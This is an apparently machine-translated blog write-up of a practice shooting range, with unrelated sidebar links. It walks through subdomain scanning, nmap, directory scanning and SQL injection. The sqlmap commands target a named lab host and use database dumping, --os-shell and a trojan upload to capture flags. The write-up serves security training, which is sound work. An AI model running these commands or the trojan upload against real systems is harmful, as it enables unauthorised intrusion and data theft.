当前位置:网站首页>Fengshentai old shooting range Kali series
Fengshentai old shooting range Kali series
2022-06-26 12:23:00 【weixin_ forty-three million four hundred and forty-six thousand】
One 、 Information collection : Subdomain detection
Download this dictionary :https://hack.zkaq.cn/file/down?id=f80ff6b197c0773b
And then use it layer Scan the subdomain name , The subdomain name obtained is shop.aqlab.cn
Two 、 Information gathering : Port scanning
namp Yes shop.aqlab.cn scan , Get the port number as 8001,flag by 8001, According to the previous customs, you can also know that the port number is 8001
3、 ... and 、 Vulnerability scanning - web Scanner
Yes http://shop.aqlab.cn:8001/ Do a directory scan ,flag stay robots.txt Under the table of contents 
Four 、 Injection test -sqlmap
The injection point is http://shop.aqlab.cn:8001/single.php?id=1, Use sqlmap To detect 
python3 sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --dbs Get the database
python3 sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 -D cake --dump-all Number acquisition cake Contents of database tables , obtain flag
5、 ... and 、Sqlmap --os-shell
Use python3 sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --os-shell
Can't use cmd Command view flag.php file , Choice in http://shop.aqlab.cn:8001/tmpupjua.php Upload the Trojan , obtain flag
边栏推荐
- 2021 q3-q4 investigation report on the use status of kotlin multiplatform
- Omni channel member link - tmall member link 3: preparation of member operation content
- Hello! Forward proxy!
- Question B of 2016 Sichuan Ti Cup Electronic Design Competition
- Build Pikachu shooting range and introduction
- One click deployment of your own community forum
- Polarismesh series articles - concept series (I)
- Is it safe to open a securities account in general
- What are the top ten securities companies? Is it safe to open a mobile account?
- 这两天搭建环境遇到的几个问题
猜你喜欢
dried food! Yiwen will show you SD card, TF card and SIM card!
HUST网络攻防实践|6_物联网设备固件安全实验|实验三 FreeRTOS-MPU 保护绕过
【Redis 系列】redis 学习十六,redis 字典(map) 及其核心编码结构
![[graduation season · advanced technology Er] I remember the year after graduation](/img/e7/8e1dafa561217b77a3e3992977a8ec.png)
[graduation season · advanced technology Er] I remember the year after graduation
Flannel's host GW and calico
Apiccloud implements the document download and preview functions
Omni channel member link - tmall member link 3: preparation of member operation content
Prospering customs through science and technology, Ronglian and Tianjin Customs jointly build a genomic database and analysis platform
2、 MySQL Foundation
19: Chapter 3: develop pass service: 2: get through Alibaba cloud SMS service in the program; (it only connects with Alibaba cloud SMS server, and does not involve specific business development)
随机推荐
Is it safe to open an account in the top ten securities app rankings in China
Introduction to the strongest swarm cluster one click deployment + hydrogen bomb level container management tool
Cross platform members get through the two channels of brand Ren Du
Oracle锁表查询和解锁方法
The most complete kubernetes core command of the latest version so far
Spark-day02-core programming-rdd
AD - 将修改后的 PCB 封装更新到当前 PCB 中
webgame开发中的文件解密
Statistical genetics: Chapter 2, the concept of statistical analysis
Analysis report on the "fourteenth five year plan" and investment prospect of China's pharmaceutical equipment industry 2022-2028
Is it safe to open a securities account
HUST網絡攻防實踐|6_物聯網設備固件安全實驗|實驗二 基於 MPU 的物聯網設備攻擊緩解技術
The best CMDB system
Scala-day02- variables and data types
The loss of female scientists
4. N queen problem
2、 MySQL Foundation
[probability theory] conditional probability, Bayesian formula, correlation coefficient, central limit theorem, parameter estimation, hypothesis test
Investment planning and forecast report on the future direction of China's smart agriculture during the 14th five year plan (2022)
Investment forecast and development strategy analysis report of China's rural sewage treatment industry in 2022